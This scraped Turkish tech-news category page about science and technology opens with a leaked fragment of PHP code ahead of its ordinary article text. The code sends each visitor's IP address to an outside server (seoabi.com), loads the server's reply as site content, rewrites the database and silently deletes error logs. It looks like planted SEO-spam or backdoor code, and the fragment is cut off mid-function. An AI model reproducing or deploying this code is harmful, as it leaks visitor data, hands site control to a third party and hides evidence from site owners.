$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> bilim haberleri | Teknoloji Haberleri

bilim haberleri kategorisindeki tüm yazılar

Son Yazılar

Teknoloji ve Bilim

Teknoloji ve Bilim Pratik bir yaşam açısından teknoloji ve bilim önemli rol oynamaktadır. Son dönemlerde üretilen tüm cihazlarda teknolojinin önemli bir yeri olmaktadır. Bu da kişilerin günlük yaşamını etkilemektedir. Teknolojinin kişilerin hayatında önemli bir yere sahip olması ile birlikte teknik bilgiye sahip olmak önemli olmaktadır. Kişiler, bu